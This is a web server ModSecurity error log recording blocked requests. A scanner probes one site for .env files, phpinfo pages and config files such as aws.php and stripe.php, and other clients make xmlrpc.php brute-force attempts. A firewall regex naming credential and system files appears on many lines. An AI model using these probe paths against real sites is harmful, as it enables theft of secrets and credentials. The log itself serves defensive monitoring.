[Tue May 26 13:39:32.038431 2026] [security2:error] [pid 536875:tid 537106] [client 106.192.248.115:62108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVPOr_-FTveSGlx1HoUwAAAOo"]
[Tue May 26 13:39:32.041773 2026] [security2:error] [pid 536875:tid 537106] [client 106.192.248.115:62108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVPOr_-FTveSGlx1HoUwAAAOo"]
[Tue May 26 13:39:32.073152 2026] [security2:error] [pid 536875:tid 536961] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/admin-app/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoVgAArlU"]
[Tue May 26 13:39:32.096527 2026] [security2:error] [pid 536875:tid 536954] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin/phpinfo.php"] [unique_id "ahVVPOr_-FTveSGlx1HoYQAA-E4"]
[Tue May 26 13:39:32.106057 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin_phpinfo.php"] [unique_id "ahVVPOr_-FTveSGlx1HoZQAAvVA"]
[Tue May 26 13:39:32.220985 2026] [security2:error] [pid 536875:tid 536959] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-backend/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoaAAAvVM"]
[Tue May 26 13:39:32.221000 2026] [security2:error] [pid 536875:tid 536966] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-node/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoaQAAvVo"]
[Tue May 26 13:39:32.222436 2026] [security2:error] [pid 536875:tid 536972] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoawAAvWA"]
[Tue May 26 13:39:32.281270 2026] [security2:error] [pid 536875:tid 536989] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/info.php"] [unique_id "ahVVPOr_-FTveSGlx1HodwAAvXE"]
[Tue May 26 13:39:32.298917 2026] [core:crit] [pid 544395:tid 544532] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:32.370058 2026] [security2:error] [pid 536875:tid 536879] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/phpinfo.php"] [unique_id "ahVVPOr_-FTveSGlx1HofwAAvQM"]
[Tue May 26 13:39:32.392087 2026] [security2:error] [pid 536875:tid 536955] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/administrator/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoZgAAvU8"]
[Tue May 26 13:39:32.515535 2026] [security2:error] [pid 536875:tid 536980] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apis/.env"] [unique_id "ahVVPOr_-FTveSGlx1HojQAA6Wg"]
[Tue May 26 13:39:32.528084 2026] [security2:error] [pid 536875:tid 536890] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/app/.env"] [unique_id "ahVVPOr_-FTveSGlx1HokwAAtQ4"]
[Tue May 26 13:39:32.688107 2026] [security2:error] [pid 536875:tid 536982] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apps/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoqgAA_2o"]
[Tue May 26 13:39:32.688771 2026] [security2:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/application/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoqQAA_yU"]
[Tue May 26 13:39:32.976608 2026] [security2:error] [pid 536875:tid 536997] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-api/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoygABAHk"]
[Tue May 26 13:39:32.977074 2026] [security2:error] [pid 536875:tid 536986] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-end/.env"] [unique_id "ahVVPOr_-FTveSGlx1HoywABAG4"]
[Tue May 26 13:39:32.979211 2026] [security2:error] [pid 536875:tid 537002] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back/.env"] [unique_id "ahVVPOr_-FTveSGlx1HozAAAqX4"]
[Tue May 26 13:39:32.981166 2026] [security2:error] [pid 536875:tid 536938] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVPOr_-FTveSGlx1HozgAAvD4"]
[Tue May 26 13:39:32.981412 2026] [security2:error] [pid 536875:tid 536991] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend-api/.env"] [unique_id "ahVVPOr_-FTveSGlx1HozQAAvHM"]
[Tue May 26 13:39:33.021314 2026] [security2:error] [pid 536875:tid 537065] [client 129.222.147.134:25653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVPer_-FTveSGlx1Ho0QAAAME"]
[Tue May 26 13:39:33.028428 2026] [security2:error] [pid 536875:tid 537065] [client 129.222.147.134:25653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVPer_-FTveSGlx1Ho0QAAAME"]
[Tue May 26 13:39:33.121802 2026] [security2:error] [pid 536875:tid 536947] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backup/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho3QAA40c"]
[Tue May 26 13:39:33.122316 2026] [security2:error] [pid 536875:tid 536964] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/be/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho3gAA41g"]
[Tue May 26 13:39:33.124231 2026] [security2:error] [pid 536875:tid 536948] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/beta/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho3wAAhkg"]
[Tue May 26 13:39:33.253607 2026] [security2:error] [pid 536875:tid 536954] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/client/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho7gAApE4"]
[Tue May 26 13:39:33.260691 2026] [security2:error] [pid 536875:tid 536944] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/cms/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho8AAA5UQ"]
[Tue May 26 13:39:33.272617 2026] [security2:error] [pid 536875:tid 536966] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config.php"] [unique_id "ahVVPer_-FTveSGlx1Ho9gAAslo"]
[Tue May 26 13:39:33.400087 2026] [security2:error] [pid 536875:tid 536978] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/config/.env"] [unique_id "ahVVPer_-FTveSGlx1Ho_QAA0GY"]
[Tue May 26 13:39:33.413737 2026] [security2:error] [pid 536875:tid 536974] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/aws.php"] [unique_id "ahVVPer_-FTveSGlx1HpAgAAw2I"]
[Tue May 26 13:39:33.415390 2026] [security2:error] [pid 536875:tid 536977] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/config.inc.php"] [unique_id "ahVVPer_-FTveSGlx1HpBQAAw2U"]
[Tue May 26 13:39:33.426087 2026] [security2:error] [pid 536875:tid 536878] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/config.php"] [unique_id "ahVVPer_-FTveSGlx1HpCAAA2gI"]
[Tue May 26 13:39:33.546196 2026] [security2:error] [pid 536875:tid 536881] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/env.php"] [unique_id "ahVVPer_-FTveSGlx1HpDQABAQU"]
[Tue May 26 13:39:33.549388 2026] [security2:error] [pid 536875:tid 536876] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/module.config.php"] [unique_id "ahVVPer_-FTveSGlx1HpEAABAQA"]
[Tue May 26 13:39:33.552794 2026] [security2:error] [pid 536875:tid 536883] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/nexmo.php"] [unique_id "ahVVPer_-FTveSGlx1HpEQAA1gc"]
[Tue May 26 13:39:33.563897 2026] [security2:error] [pid 536875:tid 536980] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/stripe.php"] [unique_id "ahVVPer_-FTveSGlx1HpFgAAyWg"]
[Tue May 26 13:39:33.672772 2026] [security2:error] [pid 536875:tid 537083] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVPer_-FTveSGlx1Ho6AAAANM"]
[Tue May 26 13:39:33.839163 2026] [security2:error] [pid 536875:tid 536904] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/cron/.env"] [unique_id "ahVVPer_-FTveSGlx1HpNgAA0hw"]
[Tue May 26 13:39:33.839582 2026] [security2:error] [pid 536875:tid 536906] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/crm/.env"] [unique_id "ahVVPer_-FTveSGlx1HpNQAA0h4"]
[Tue May 26 13:39:33.840428 2026] [security2:error] [pid 536875:tid 536911] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/demo/.env"] [unique_id "ahVVPer_-FTveSGlx1HpOAAA0iM"]
[Tue May 26 13:39:33.840842 2026] [security2:error] [pid 536875:tid 536899] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/current/.env"] [unique_id "ahVVPer_-FTveSGlx1HpNwAA0hc"]
[Tue May 26 13:39:33.842264 2026] [security2:error] [pid 536875:tid 536984] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/dev/.env"] [unique_id "ahVVPer_-FTveSGlx1HpOwAA0mw"]
[Tue May 26 13:39:33.852261 2026] [security2:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/develop/.env"] [unique_id "ahVVPer_-FTveSGlx1HpPQAAkyU"]
[Tue May 26 13:39:33.853491 2026] [security2:error] [pid 536875:tid 536912] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/developer/.env"] [unique_id "ahVVPer_-FTveSGlx1HpPgAAkyQ"]
